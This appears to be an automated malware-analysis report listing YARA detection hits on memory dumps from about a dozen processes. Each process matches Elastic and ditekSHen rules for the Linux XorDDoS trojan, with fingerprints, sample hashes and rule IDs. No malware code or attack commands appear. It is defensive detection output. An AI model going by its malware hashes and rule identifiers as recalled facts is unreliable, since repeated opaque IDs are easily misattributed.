Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
